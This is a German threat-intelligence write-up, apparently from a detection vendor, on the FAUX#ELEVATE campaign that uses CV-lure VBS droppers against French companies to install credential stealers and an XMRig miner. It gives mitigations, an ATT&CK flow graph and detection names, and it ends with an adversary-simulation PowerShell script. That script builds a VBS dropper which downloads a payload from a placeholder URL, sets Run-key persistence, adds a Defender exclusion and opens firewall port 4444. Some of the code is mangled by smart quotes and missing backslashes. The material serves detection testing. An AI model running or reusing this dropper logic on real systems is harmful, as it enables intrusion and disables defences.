Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen auf Frankreich mit CV-Ködern, um Krypto-Miner und Infostealer in Unternehmensumgebungen zu installieren
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine Cybercrime-Operation nutzt eine bösartige VBS-Lebenslaufdatei, um auf Französisch sprechende Unternehmensumgebungen abzuzielen. Der Dropper ist stark verschleiert und so konzipiert, dass er nur auf domänengebundenen Maschinen ausgeführt wird, wo er Malware zur Anmeldeinformationsdiebstahl zusammen mit einem Monero-Miner liefert. Die Kampagne nutzt vertrauenswürdige Dienste wie Dropbox und kompromittierte marokkanische WordPress-Websites, um Nutzlasten zu hosten. Gestohlene Daten werden über SMTP nach mail.ruexfiltriert, und die Malware entfernt Spuren nach der Ausführung, um die forensische Sichtbarkeit zu verringern.
Untersuchung
Forscher haben den VBS-Dropper rückentwickelt, seine Umgebungsprüfungen aufgedeckt und die vollständige, mehrstufige Infektionskette nachverfolgt, einschließlich der 7-Zip-Extraktion, eines benutzerdefinierten RATs namens RuntimeHost.exe, dem Diebstahl von Browser-Anmeldeinformationen über ChromElevator und der XMRig-Mining-Aktivität. Sie identifizierten auch unterstützende Infrastrukturen wie IP-Adressen, dynamische DNS-Einträge und gehackte WordPress-Server. Die Persistenz wurde mit Registrierungsschlüsseln für den Start verbunden und einer versteckten geplanten Aufgabe.
Minderung
Verteidiger sollten verdächtige VBS-Dateien blockieren und strenge Kontrollen bei E-Mail-Anhängen durchsetzen. Die Überwachung sollte sich auf die ungewöhnliche Ausführung von wscript.exe, PowerShell-Befehle, die Defender-Ausschlüsse hinzufügen, und Registrierungsänderungen, die EnableLUA betreffen, konzentrieren. Organisationen sollten ausgehende SMTP-Verbindungen von Nicht-Mail-Anwendungen einschränken und Verbindungen zu bekannten Dropbox- und Mining-Pool-Infrastrukturen beobachten. Jegliche identifizierten Registrierungsschlüssel oder geplante Aufgaben sollten entfernt oder unter Quarantäne gestellt werden.
Reaktion
Sicherheitsteams sollten die Erstellung der „Microsoft Media Service“ und „z_MicrosoftEdgeAutoLaunch_2EDFBF“ Registrierungsschlüssel sowie die versteckte „MicrosoftUpdateService“ geplante Aufgabe erkennen. Warnungen sollten ausgelöst werden durch wscript.exe-Prozesse, die auf Dropbox oder die dokumentierten WordPress-Domains zugreifen. Schädliche Dateien müssen unter Quarantäne gestellt, der Host isoliert und die offengelegten Browser-Anmeldeinformationen zurückgesetzt werden. Eine forensische Überprüfung sollte anschließend klären, ob Daten durch mail.ru.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% Node definitions step_phishing["<b>Technik</b> – T1566.001 Phishing: Spear-Phishing-Anhang<br/><b>Beschreibung</b>: E-Mail mit bösartigem Anhang, die beim Öffnen die erste Nutzlast liefert."] class step_phishing action step_user_execute["<b>Technik</b> – T1204.002 Benutzerausführung: Bösartige Datei<br/><b>Beschreibung</b>: Das Opfer führt die angehängte VBS-Datei aus und löst den Dropper aus."] class step_user_execute action step_dropper["<b>Technik</b> – T1059.005 Visual Basic (VBScript)<br/><b>Technik</b> – T1027 Verschleierte Dateien oder Informationen<br/><b>Beschreibung</b>: Verschleiertes VBS-Skript dient als Dropper, der zusätzliche Komponenten extrahiert."] class step_dropper action step_domain_check["<b>Technik</b> – T1069.002 Berechtigungsgruppen-Erkennung: Domain<br/><b>Beschreibung</b>: Überprüft, ob der Host einer Domain beigetreten ist, um das Verhalten anzupassen."] class step_domain_check technique step_uac_bypass["<b>Technik</b> – T1548.002 Benutzerkontensteuerung umgehen<br/><b>Technik</b> – T1562.001 Verteidigungen beeinträchtigen: Sicherheitstools deaktivieren<br/><b>Technik</b> – T1564.012 Artefakte verstecken: Defender-Ausschlüsse<br/><b>Beschreibung</b>: Erhöht Privilegien, deaktiviert Verteidigungen und fügt Ausschlüsse hinzu."] class step_uac_bypass technique step_download["<b>Technik</b> – T1102 Webservice<br/><b>Technik</b> – T1102.001 Dead Drop-Resolver<br/><b>Beschreibung</b>: Ruft zusätzliche Nutzlasten von Dropbox oder Web-Standorten ab."] class step_download technique step_deploy_toolkit["<b>Tool</b> – RuntimeHost.exe, XMRig Miner, Browser-Stealer<br/><b>Beschreibung</b>: Setzt Komponenten zur Nutzung für Mining, Anmeldeinformationsdiebstahl und weitere Ausnutzung ein."] class step_deploy_toolkit tool step_cred_access["<b>Technik</b> – T1555.003 Anmeldeinformationen von Webbrowsern<br/><b>Beschreibung</b>: Extrahiert gespeicherte Browser-Passwörter und Cookies."] class step_cred_access technique step_collect_files["<b>Technik</b> – T1005 Daten vom lokalen System<br/><b>Beschreibung</b>: Sammelt Dateien vom Desktop des Benutzers für die Exfiltration."] class step_collect_files technique step_exfiltration["<b>Technik</b> – T1048.002 Exfiltration über verschlüsseltem Nicht-C2-Protokoll: SMTP<br/><b>Technik</b> – T1071.003 Webprotokolle: Mail-Protokolle<br/><b>Beschreibung</b>: Sendet gesammelte Daten über verschlüsseltes SMTP."] class step_exfiltration technique step_resource_hijack["<b>Technik</b> – T1496 Ressourcenumleitung<br/><b>Beschreibung</b>: Nutzt XMRig zum Kryptowährungs-Mining auf dem Opferhost."] class step_resource_hijack technique step_process_injection["<b>Technik</b> – T1055 Prozessinjektion<br/><b>Beschreibung</b>: Injiziert schädlichen Code in explorer.exe, um Aktivitäten zu verbergen."] class step_process_injection technique step_c2["<b>Technik</b> – T1102 Web Service (HTTPS/Dynamic DNS)<br/><b>Beschreibung</b>: Hält Befehls- und Steuerungskontrolle über verschlüsselten Webverkehr und benutzerdefinierte Ports aufrecht."] class step_c2 technique step_persistence["<b>Technik</b> – T1547.001 Registry Run Keys / Startordner<br/><b>Technik</b> – T1053 Geplante Aufgabe/Job (versteckt)<br/><b>Beschreibung</b>: Etabliert Persistenz über Run-Schlüssel und eine versteckte geplante Aufgabe."] class step_persistence technique step_cleanup["<b>Technik</b> – T1070.004 Dateilöschung<br/><b>Beschreibung</b>: Entfernt Artefakte und Protokolle, um eine Erkennung zu vermeiden."] class step_cleanup technique %% Edge connections step_phishing –>|führt zu| step_user_execute step_user_execute –>|führt zu| step_dropper step_dropper –>|führt zu| step_domain_check step_domain_check –>|führt zu| step_uac_bypass step_uac_bypass –>|führt zu| step_download step_download –>|führt zu| step_deploy_toolkit step_deploy_toolkit –>|ermöglicht| step_cred_access step_deploy_toolkit –>|ermöglicht| step_collect_files step_cred_access –>|kombiniert mit| step_collect_files step_cred_access –>|unterstützt| step_exfiltration step_collect_files –>|unterstützt| step_exfiltration step_deploy_toolkit –>|ermöglicht| step_resource_hijack step_deploy_toolkit –>|ermöglicht| step_process_injection step_process_injection –>|bietet| step_c2 step_c2 –>|genutzt von| step_exfiltration step_deploy_toolkit –>|etabliert| step_persistence step_persistence –>|gefolgt von| step_cleanup step_exfiltration –>|gefolgt von| step_cleanup "
Angriffsablauf
Erkennungen
Möglicher IP-Abfrage-Domain-Kommunikationsversuch (via dns)
Ansehen
Deaktivieren der Echtzeitüberwachung von Windows Defender und andere Einstellungen ändern (via cmdline)
Ansehen
Verdächtige Ausführung aus dem öffentlichen Benutzerprofil (via process_creation)
Ansehen
Mögliche Verteidigungsumgehung durch Extraktion eines verschlüsselten Archivs mit 7-Zip (via cmdline)
Ansehen
LOLBAS WScript / CScript (via process_creation)
Ansehen
Verdächtige Änderung der Defender-Ausschlüsse (via cmdline)
Ansehen
Verdächtige Änderungen der Windows Defender-Einstellungen (via PowerShell)
Ansehen
Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (via registry_event)
Ansehen
Verdächtige geplante Aufgabe (via audit)
Ansehen
Kurzer Dateiname (via cmdline)
Ansehen
Möglicher UAC-Umgehungsversuch – UAC-Deaktivierungsversuch (via registry_event)
Ansehen
Verdächtige Dateien im öffentlichen Benutzerprofil (via file_event)
Ansehen
IOCs (HashSha256) um zu erkennen: Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen mit CV-Ködern auf Frankreich, um Crypto-Miner und Infostealer gegen Unternehmensumgebungen einzusetzen
Ansehen
IOCs (SourceIP) um zu erkennen: Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen mit CV-Ködern auf Frankreich, um Crypto-Miner und Infostealer gegen Unternehmensumgebungen einzusetzen
Ansehen
IOCs (Emails) um zu erkennen: Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen mit CV-Ködern auf Frankreich, um Crypto-Miner und Infostealer gegen Unternehmensumgebungen einzusetzen
Ansehen
IOCs (DestinationIP) um zu erkennen: Analyse von FAUX#ELEVATE: Bedrohungsakteure zielen mit CV-Ködern auf Frankreich, um Crypto-Miner und Infostealer gegen Unternehmensumgebungen einzusetzen
Ansehen
FAUX Elevate Anmeldeinformationen und Kryptowährungs-Mining-Erkennung [Windows-Netzwerkverbindung]
Ansehen
Erkennung der SMTP- und C2-Domain-Kommunikation [Windows-Netzwerkverbindung]
Ansehen
Erkennung der FAUX#ELEVATE-Kampagne Persistenz und Anmeldeinformationsdiebstahl [Windows-Prozesserstellung]
Ansehen
Erkennung von bösartigem VBS-Dropper und Firewall-Modifikationen [Windows-Prozesserstellung]
Ansehen
Simulation Execution
Voraussetzung: Der Telemetrie- & Basislinien-Vorab-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die erkannten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu generieren, die von der Erkennungslogik erwartet wird.
-
Angriffsbericht & Befehle:
- Stufe 1 – Bösartiges VBS ablegen: Der Angreifer schreibt einen VBS-Dropper, der eine Nutzlast der zweiten Stufe herunterlädt und einen Registrierungslauf-Schlüssel für die Persistenz schreibt.
- Stufe 2 – VBS ausführen über
wscript.exemit PowerShell als übergeordnetem Prozess, wodurch die übergeordnete Bedingung der Erkennung erfüllt wird. - Stufe 3 – Innerhalb des VBS PowerShell aufrufen, um einen Microsoft Defender-Ausschluss hinzuzufügen (T1562.001) und Netsh, um den TCP-Eingangsport 4444 (T1562.004) für C2 zu öffnen.
- Stufe 4 – Beweise nach Erfolg bereinigen.
-
Regressionstest-Skript: (PowerShell – eigenständig; mit Administratorrechten ausführen)
# ----------------------------------------------------------------------- # Schädliche VBS-Dropper-Simulation – löst Sigma-Regel aus: # Bild == "*wscript.exe" UND ParentImage in ("*powershell.exe","*netsh.exe") # ----------------------------------------------------------------------- $vbsPath = "$env:Tempmalicious_dropper.vbs" $payloadUrl = "http://example.com/payload.exe" # Platzhalter-URL $payloadPath = "$env:Temppayload.exe" # 1. Schaffe bösartiges VBS, das: # • eine Nutzlast herunterlädt # • einen Run-Schlüssel für die Persistenz schreibt # • PowerShell aufruft, um Defender-Ausschluss hinzuzufügen # • Netsh aufruft, um eine Firewall-Regel zu öffnen $vbsContent = @" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET", "$payloadUrl", False objXML.Send If objXML.Status = 200 Then Set objStream = CreateObject("ADODB.Stream") objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile "$payloadPath", 2 End If
‚ Persistenz durch Run-Schlüssel Set objShell = CreateObject(„WScript.Shell“) objShell.RegWrite „HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious“, „$payloadPath“
‚ Defender-Ausschluss via PowerShell (innerhalb ausgeführt) objShell.Run „powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'„“, 0, True
‚ Öffne Firewall-Port 4444 via Netsh (innerhalb ausgeführt) objShell.Run „netsh.exe advfirewall firewall add rule name="MaliciousPort“ dir=in action=allow protocol=TCP localport=4444″, 0, True „@
Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 2. Starte das VBS mit PowerShell als übergeordnetem Prozess
Write-Host "[*] Starte bösartiges VBS über wscript.exe (übergeordnet: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait
# 3. Prüfen, ob die Firewall-Regel hinzugefügt wurde (optional)
netsh advfirewall firewall show rule name=MaliciousPort
# 4. Bereinige Artefakte (Payload & VBS) - separat für den Bereinigungsabschnitt belassen
Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie Warnungen im SIEM."
-
Bereinigungskommandos: (nach Überprüfung ausführen)
# Entferne Firewall-Regel netsh advfirewall firewall delete rule name="MaliciousPort" # Entferne Defender-Ausschluss powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'" # Lösche Persistenz-Run-Schlüssel reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f # Lösche Dateien Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force Remove-Item -Path "$env:Temppayload.exe" -Force Write-Host "[+] Bereinigung abgeschlossen."